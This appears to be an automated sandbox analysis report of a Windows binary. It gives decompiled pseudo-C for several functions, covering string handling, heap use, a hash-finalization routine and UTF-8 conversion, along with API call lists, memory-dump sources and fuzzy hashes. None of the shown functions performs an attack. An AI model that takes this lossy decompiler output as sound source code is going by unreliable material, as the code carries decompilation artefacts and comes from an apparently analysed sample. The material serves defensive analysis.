                                                                                                                                                                      0x00409660
                                                                                                                                                                      0x00409662
                                                                                                                                                                      0x00409668
                                                                                                                                                                      0x0040966b
                                                                                                                                                                      0x0040966d
                                                                                                                                                                      0x00409675
                                                                                                                                                                      0x0040967a
                                                                                                                                                                      0x00409682
                                                                                                                                                                      0x00409682
                                                                                                                                                                      0x00409688
                                                                                                                                                                      0x0040968f
                                                                                                                                                                      0x00409696

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
                                                                                                                                                                        • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040E267
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                                                                                                                      • wcscmp.MSVCRT ref: 00409662
                                                                                                                                                                      • memmove.MSVCRT ref: 0040967A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                                                                                                                                      • String ID: \\?\
                                                                                                                                                                      • API String ID: 2309408642-4282027825
                                                                                                                                                                      • Opcode ID: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
                                                                                                                                                                      • Instruction ID: d9f8f264266041fd0450fbf5fddac35174bfa4872681c7093a6bedb058d4d6d6
                                                                                                                                                                      • Opcode Fuzzy Hash: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
                                                                                                                                                                      • Instruction Fuzzy Hash: 36F082B31007017BD2106777EC89CAB7F6CEB953B47500A3FF915D25D1EA39982486B8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040B1D6, Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                      			E0040B1D6(intOrPtr _a4, void* _a8) {
				void _v8;
				intOrPtr _t42;
				void* _t43;
				void* _t46;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t52;
				void* _t54;

				_t52 = _a8;
				_t49 = 0;
				do {
					_t43 = 3;
					asm("sbb eax, eax");
					 *((char*)(_t54 + _t49 + 0x10)) =  *(_t52 + 0x14 +  ~(_t49 & 0x00000003) * 4) >> _t43 - (_t49 & 0x00000003) << 3;
					_t49 = _t49 + 1;
				} while (_t49 < 8);
				_push(1);
				_push(0x4126e8);
				_push(_t52);
				E0040C5D6();
				_t51 = _t52 + 0x14;
				while(1) {
					_t54 = _t54 + 0xc;
					if(( *_t51 & 0x000001f8) == 0x1c0) {
						break;
					}
					_push(1);
					_push(0x4126ec);
					_push(_t52);
					E0040C5D6();
				}
				_push(8);
				_push( &_v8);
				_push(_t52);
				E0040C5D6();
				_t42 = _a4;
				_t50 = 0;
				do {
					_t46 = 3;
					 *((char*)(_t50 + _t42)) =  *(_t52 + (_t50 >> 2) * 4) >> _t46 - (_t50 & 0x00000003) << 3;
					_t50 = _t50 + 1;
				} while (_t50 < 0x14);
				memset(_t52 + 0x1c, 0, 0x40);
				memset(_t52, 0, 0x14);
				memset(_t51, 0, 8);
				memset( &_v8, 0, 8);
				return memset(_t52 + 0x60, 0, 0x40);
			}












                                                                                                                                                                      0x0040b1db
                                                                                                                                                                      0x0040b1e2
                                                                                                                                                                      0x0040b1e4
                                                                                                                                                                      0x0040b1eb
                                                                                                                                                                      0x0040b1f4
                                                                                                                                                                      0x0040b1fe
                                                                                                                                                                      0x0040b202
                                                                                                                                                                      0x0040b203
                                                                                                                                                                      0x0040b208
                                                                                                                                                                      0x0040b20a
                                                                                                                                                                      0x0040b20f
                                                                                                                                                                      0x0040b210
                                                                                                                                                                      0x0040b215
                                                                                                                                                                      0x0040b22c
                                                                                                                                                                      0x0040b22e
                                                                                                                                                                      0x0040b238
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040b21f
                                                                                                                                                                      0x0040b221
                                                                                                                                                                      0x0040b226
                                                                                                                                                                      0x0040b227
                                                                                                                                                                      0x0040b227
                                                                                                                                                                      0x0040b23a
                                                                                                                                                                      0x0040b240
                                                                                                                                                                      0x0040b241
                                                                                                                                                                      0x0040b242
                                                                                                                                                                      0x0040b247
                                                                                                                                                                      0x0040b24e
                                                                                                                                                                      0x0040b250
                                                                                                                                                                      0x0040b257
                                                                                                                                                                      0x0040b267
                                                                                                                                                                      0x0040b26a
                                                                                                                                                                      0x0040b26b
                                                                                                                                                                      0x0040b277
                                                                                                                                                                      0x0040b280
                                                                                                                                                                      0x0040b289
                                                                                                                                                                      0x0040b296
                                                                                                                                                                      0x0040b2b0

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                      • Opcode ID: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
                                                                                                                                                                      • Instruction ID: d1c0989406727a65e9950a574f083ae989d166c781cac5fdd553c274dd2af307
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
                                                                                                                                                                      • Instruction Fuzzy Hash: D821F1317507082BE124AA29DC86F9F738CDB81708F40063EF201FA1C1CAB9F54546AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405B40, Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00405B40() {
				void* _t52;
				signed int _t62;
				void _t63;
				void* _t65;
				signed int _t67;
				void* _t68;
				signed int _t76;
				void* _t78;
				long _t81;
				signed int _t82;
				wchar_t* _t84;
				signed int _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				wchar_t* _t93;
				void* _t95;
				int _t97;
				wchar_t* _t98;
				void* _t100;

				_t93 =  *(_t100 + 0x20);
				if(_t93 == 0) {
					_t82 = 0;
					L5:
					_t52 = E0040E180(_t86, _t93);
					_t95 =  *(_t100 + 0x24);
					 *(_t100 + 0x24) = _t52;
					 *(_t100 + 0x28) = E0040E180(_t86, _t95);
					_t98 = E0040E200(_t82,  *((intOrPtr*)(_t100 + 0x34)));
					_t55 =  *(_t100 + 0x20);
					if( *(_t100 + 0x20) != 0) {
						_t93 = E0040E2D0(_t86, _t55);
					}
					_t56 =  *(_t100 + 0x24);
					if( *(_t100 + 0x24) != 0) {
						_t95 = E0040E2D0(_t86, _t56);
					}
					 *(_t100 + 0x18) = _t98;
					if(_t93 == 0 ||  *_t93 == 0) {
						L38:
						E0040E350(_t86, _t82 - (_t98 -  *(_t100 + 0x18) >> 1));
						 *_t98 = 0;
						return 0;
					} else {
						if(_t95 == 0 ||  *_t95 == 0) {
							_t86 = _t98 - _t93;
							do {
								_t62 =  *_t93 & 0x0000ffff;
								_t93 =  &(_t93[0]);
								 *(_t86 + _t93 - 2) = _t62;
							} while (_t62 != 0);
							_t98 = _t98 + _t82 * 2;
							goto L38;
						} else {
							_t88 = _t95;
							 *(_t100 + 0x14) = _t93;
							_t11 = _t88 + 2; // 0x2
							_t90 = _t11;
							do {
								_t63 =  *_t88;
								_t88 = _t88 + 2;
							} while (_t63 != 0);
							_t86 = _t88 - _t90 >> 1;
							 *(_t100 + 0x20) = _t86;
							if( *(_t100 + 0x24) == 0) {
								 *(_t100 + 0x10) =  *(_t100 + 0x2c);
								L20:
								 *((intOrPtr*)(_t100 + 0x34)) = 0x40530d;
								if(( *(_t100 + 0x28) & 0x00000001) == 0) {
									 *((intOrPtr*)(_t100 + 0x34)) = L004052F5;
								}
								_t65 =  *(_t100 + 0x2c);
								if(_t65 > 1) {
									wcsncpy(_t98, _t93, _t65 - 1);
									_t76 =  *(_t100 + 0x38);
									_t100 = _t100 + 0xc;
									_t98 = _t98 + _t76 * 2 + 0xfffffffe;
									_t93 = _t93 + _t76 * 2 + 0xfffffffe;
								}
								if( *_t93 == 0) {
									L30:
									if( *(_t100 + 0x24) != 0) {
										HeapFree( *0x417008, 0,  *(_t100 + 0x10));
									}
									goto L38;
								} else {
									_t67 =  *(_t100 + 0x20);
									do {
										_t68 =  *((intOrPtr*)(_t100 + 0x40))(_t93, _t95, _t67);
										_t100 = _t100 + 0xc;
										if(_t68 != 0) {
											 *_t98 =  *_t93;
											_t98 =  &(_t98[0]);
											_t67 =  *(_t100 + 0x20);
											_t93 =  &(_t93[0]);
											goto L33;
										}
										_t67 =  *(_t100 + 0x20);
										_t86 =  *(_t100 + 0x30);
										_t93 = _t93 + _t67 * 2;
										if(_t86 == 0xffffffff) {
											goto L33;
										}
										_t86 = _t86 - 1;
										 *(_t100 + 0x30) = _t86;
										if(_t86 > 0) {
											goto L33;
										}
										_t97 = _t82 - (_t93 -  *(_t100 + 0x14) >> 1);
										wcsncpy(_t98, _t93, _t97);
										_t100 = _t100 + 0xc;
										_t98 = _t98 + _t97 * 2;
										goto L30;
										L33:
									} while ( *_t93 != 0);
									goto L30;
								}
							}
							_t78 = HeapAlloc( *0x417008, 0, 2 + _t86 * 2);
							 *(_t100 + 0x10) = _t78;
							_t92 = _t78 - _t95;
							do {
								_t86 =  *_t95 & 0x0000ffff;
								_t95 = _t95 + 2;
								 *(_t92 + _t95 - 2) = _t86;
							} while (_t86 != 0);
							_t95 = _t78;
							goto L20;
						}
					}
				}
				_t84 = _t93;
				_t86 =  &(_t84[0]);
				do {
					_t81 =  *_t84;
					_t84 =  &(_t84[0]);
				} while (_t81 != 0);
				_t82 = _t84 - _t86 >> 1;
				goto L5;
			}























                                                                                                                                                                      0x00405b47
                                                                                                                                                                      0x00405b4d
                                                                                                                                                                      0x00405b65
                                                                                                                                                                      0x00405b67
                                                                                                                                                                      0x00405b68
                                                                                                                                                                      0x00405b6d
                                                                                                                                                                      0x00405b72
                                                                                                                                                                      0x00405b7f
                                                                                                                                                                      0x00405b89
                                                                                                                                                                      0x00405b8b
                                                                                                                                                                      0x00405b91
                                                                                                                                                                      0x00405b99
                                                                                                                                                                      0x00405b99
                                                                                                                                                                      0x00405b9b
                                                                                                                                                                      0x00405ba1
                                                                                                                                                                      0x00405ba9
                                                                                                                                                                      0x00405ba9
                                                                                                                                                                      0x00405bab
                                                                                                                                                                      0x00405bb1
                                                                                                                                                                      0x00405d14
                                                                                                                                                                      0x00405d1f
                                                                                                                                                                      0x00405d28
                                                                                                                                                                      0x00405d31
                                                                                                                                                                      0x00405bc1
                                                                                                                                                                      0x00405bc3
                                                                                                                                                                      0x00405cfb
                                                                                                                                                                      0x00405d00
                                                                                                                                                                      0x00405d00
                                                                                                                                                                      0x00405d03
                                                                                                                                                                      0x00405d06
                                                                                                                                                                      0x00405d0b
                                                                                                                                                                      0x00405d10
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405bd3
                                                                                                                                                                      0x00405bd3
                                                                                                                                                                      0x00405bd5
                                                                                                                                                                      0x00405bd9
                                                                                                                                                                      0x00405bd9
                                                                                                                                                                      0x00405be0
                                                                                                                                                                      0x00405be0
                                                                                                                                                                      0x00405be3
                                                                                                                                                                      0x00405be6
                                                                                                                                                                      0x00405bed
                                                                                                                                                                      0x00405bf4
                                                                                                                                                                      0x00405bf8
                                                                                                                                                                      0x00405c38
                                                                                                                                                                      0x00405c3c
                                                                                                                                                                      0x00405c41
                                                                                                                                                                      0x00405c49
                                                                                                                                                                      0x00405c4b
                                                                                                                                                                      0x00405c4b
                                                                                                                                                                      0x00405c53
                                                                                                                                                                      0x00405c5a
                                                                                                                                                                      0x00405c60
                                                                                                                                                                      0x00405c65
                                                                                                                                                                      0x00405c69
                                                                                                                                                                      0x00405c73
                                                                                                                                                                      0x00405c76
                                                                                                                                                                      0x00405c76
                                                                                                                                                                      0x00405c7d
                                                                                                                                                                      0x00405cc5
                                                                                                                                                                      0x00405cca
                                                                                                                                                                      0x00405cd8
                                                                                                                                                                      0x00405cd8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405c7f
                                                                                                                                                                      0x00405c7f
                                                                                                                                                                      0x00405c83
                                                                                                                                                                      0x00405c86
                                                                                                                                                                      0x00405c8a
                                                                                                                                                                      0x00405c8f
                                                                                                                                                                      0x00405ce3
                                                                                                                                                                      0x00405ce7
                                                                                                                                                                      0x00405cea
                                                                                                                                                                      0x00405cee
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405cee
                                                                                                                                                                      0x00405c91
                                                                                                                                                                      0x00405c95
                                                                                                                                                                      0x00405c99
                                                                                                                                                                      0x00405c9f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405ca1
                                                                                                                                                                      0x00405ca2
                                                                                                                                                                      0x00405ca8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405cb4
                                                                                                                                                                      0x00405cb9
                                                                                                                                                                      0x00405cbe
                                                                                                                                                                      0x00405cc1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405cf1
                                                                                                                                                                      0x00405cf1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405cf7
                                                                                                                                                                      0x00405c7d
                                                                                                                                                                      0x00405c0a
                                                                                                                                                                      0x00405c12
                                                                                                                                                                      0x00405c16
                                                                                                                                                                      0x00405c20
                                                                                                                                                                      0x00405c20
                                                                                                                                                                      0x00405c23
                                                                                                                                                                      0x00405c26
                                                                                                                                                                      0x00405c2b
                                                                                                                                                                      0x00405c30
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405c30
                                                                                                                                                                      0x00405bc3
                                                                                                                                                                      0x00405bb1
                                                                                                                                                                      0x00405b4f
                                                                                                                                                                      0x00405b51
                                                                                                                                                                      0x00405b54
                                                                                                                                                                      0x00405b54
                                                                                                                                                                      0x00405b57
                                                                                                                                                                      0x00405b5a
                                                                                                                                                                      0x00405b61
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocHeapwcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2304708654-0
                                                                                                                                                                      • Opcode ID: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
                                                                                                                                                                      • Instruction ID: cb064e81f22c81d64e764a7bfd7558cc4db0c0b6a5bd9f26a61017110445664c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4400bf17a7ab25ba1853b7dace69af7ef1599cfcf7aa925f7f2e8bfe761e0971
                                                                                                                                                                      • Instruction Fuzzy Hash: 2151DE305087059BDB209F28D844A6BB7F4FF84348F544A2EFC45A72D0E778E915CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406610, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00406610() {
				WCHAR* _t16;
				signed short _t19;
				WCHAR* _t20;
				signed short* _t25;
				signed short _t27;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed short* _t34;
				signed short* _t36;
				signed short* _t42;
				signed short* _t44;
				signed short* _t45;
				signed int _t47;
				WCHAR* _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x24);
				_t16 =  *_t44 & 0x0000ffff;
				_t45 =  &(_t44[1]);
				 *(_t49 + 0x2c) = _t45;
				if(_t16 == 0) {
					return  *(_t49 + 0x28);
				} else {
					_t31 = CharLowerW(_t16) & 0x0000ffff;
					_t33 =  &(_t45[1]);
					 *(_t49 + 0x1c) = _t31;
					do {
						_t19 =  *_t45;
						_t45 =  &(_t45[1]);
					} while (_t19 != 0);
					_t42 =  *(_t49 + 0x28);
					_t47 = _t45 - _t33 >> 1;
					 *(_t49 + 0x18) = _t47;
					while(1) {
						_t20 =  *_t42 & 0x0000ffff;
						_t42 =  &(_t42[1]);
						if(_t20 == 0) {
							break;
						}
						if(CharLowerW(_t20) != _t31) {
							continue;
						} else {
							_t36 =  *(_t49 + 0x2c);
							_t32 = _t47;
							_t34 = _t36;
							if(_t47 == 0) {
								L13:
								return _t42 - 2;
							} else {
								_t25 = _t42 - _t36;
								 *(_t49 + 0x14) = _t25;
								while(1) {
									_t48 =  *(_t25 + _t34) & 0x0000ffff;
									 *(_t49 + 0x14) =  &(_t34[1]);
									_t27 = CharLowerW( *_t34 & 0x0000ffff);
									if((CharLowerW(_t48) & 0x0000ffff) != (_t27 & 0x0000ffff)) {
										break;
									}
									if(_t48 == 0) {
										goto L13;
									} else {
										_t32 = _t32 - 1;
										if(_t32 == 0) {
											goto L13;
										} else {
											_t34 =  *(_t49 + 0x10);
											_t25 =  *(_t49 + 0x14);
											continue;
										}
									}
									goto L16;
								}
								_t47 =  *(_t49 + 0x18);
								_t31 =  *(_t49 + 0x1c);
								continue;
							}
						}
						goto L16;
					}
					return 0;
				}
				L16:
			}



















                                                                                                                                                                      0x00406615
                                                                                                                                                                      0x0040661b
                                                                                                                                                                      0x0040661f
                                                                                                                                                                      0x00406622
                                                                                                                                                                      0x00406629
                                                                                                                                                                      0x004066fe
                                                                                                                                                                      0x0040662f
                                                                                                                                                                      0x00406638
                                                                                                                                                                      0x0040663b
                                                                                                                                                                      0x0040663e
                                                                                                                                                                      0x00406642
                                                                                                                                                                      0x00406642
                                                                                                                                                                      0x00406646
                                                                                                                                                                      0x00406649
                                                                                                                                                                      0x0040664e
                                                                                                                                                                      0x00406654
                                                                                                                                                                      0x00406656
                                                                                                                                                                      0x00406660
                                                                                                                                                                      0x00406660
                                                                                                                                                                      0x00406663
                                                                                                                                                                      0x00406669
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406675
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406677
                                                                                                                                                                      0x00406677
                                                                                                                                                                      0x0040667b
                                                                                                                                                                      0x0040667d
                                                                                                                                                                      0x00406681
                                                                                                                                                                      0x004066da
                                                                                                                                                                      0x004066e6
                                                                                                                                                                      0x00406683
                                                                                                                                                                      0x00406685
                                                                                                                                                                      0x00406687
                                                                                                                                                                      0x00406690
                                                                                                                                                                      0x00406690
                                                                                                                                                                      0x0040669b
                                                                                                                                                                      0x0040669f
                                                                                                                                                                      0x004066b0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066b5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066b7
                                                                                                                                                                      0x004066b7
                                                                                                                                                                      0x004066b8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066ba
                                                                                                                                                                      0x004066c0
                                                                                                                                                                      0x004066c4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066c4
                                                                                                                                                                      0x004066b8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066b5
                                                                                                                                                                      0x004066d0
                                                                                                                                                                      0x004066d4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004066d4
                                                                                                                                                                      0x00406681
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406675
                                                                                                                                                                      0x004066f0
                                                                                                                                                                      0x004066f0
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharLower
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1615517891-0
                                                                                                                                                                      • Opcode ID: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                                                                                                                      • Instruction ID: 85927fc96f9716e1d1e6d5b1ddc4ac0db90fb70db8c0b3b43891102a4ed5054c
                                                                                                                                                                      • Opcode Fuzzy Hash: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A215775A043198BC710EF59A840477B7E4EB80761F46087AFC85A3380D63AEE199BB9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00411E80, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00411E80(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t2 =  &(_t13[1]); // 0x2
					_t17 = _t2;
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t3 = (_t13 - _t17 >> 1) + 1; // -1
					_t20 = _t3;
					_t12 = WideCharToMultiByte(0xfde9, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0xfde9, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}












                                                                                                                                                                      0x00411e83
                                                                                                                                                                      0x00411e8a
                                                                                                                                                                      0x00411ef4
                                                                                                                                                                      0x00411ef6
                                                                                                                                                                      0x00411efe
                                                                                                                                                                      0x00411f05
                                                                                                                                                                      0x00411e8c
                                                                                                                                                                      0x00411e8c
                                                                                                                                                                      0x00411e8e
                                                                                                                                                                      0x00411e8e
                                                                                                                                                                      0x00411e91
                                                                                                                                                                      0x00411e91
                                                                                                                                                                      0x00411e94
                                                                                                                                                                      0x00411e97
                                                                                                                                                                      0x00411ea8
                                                                                                                                                                      0x00411ea8
                                                                                                                                                                      0x00411eba
                                                                                                                                                                      0x00411ebe
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411ec0
                                                                                                                                                                      0x00411ec0
                                                                                                                                                                      0x00411ec9
                                                                                                                                                                      0x00411ecb
                                                                                                                                                                      0x00411ed0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411ed2
                                                                                                                                                                      0x00411ee7
                                                                                                                                                                      0x00411ef1
                                                                                                                                                                      0x00411ef1
                                                                                                                                                                      0x00411ed0
                                                                                                                                                                      0x00411ebe

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D058,00000000), ref: 00411EB4
                                                                                                                                                                      • malloc.MSVCRT ref: 00411EC4
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411EE1
                                                                                                                                                                      • malloc.MSVCRT ref: 00411EF6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2735977093-0
                                                                                                                                                                      • Opcode ID: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                                                                                                                      • Instruction ID: da1f4c5307a9808d3c7f8614f95932c7effa64efca2e052dfed00f08d58b5d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                                                                                                                      • Instruction Fuzzy Hash: FE012E3734030227E32066A6AC02FE77B49CB85B95F19407AFF005E2C1CAA3A8008A79
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00411F20, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
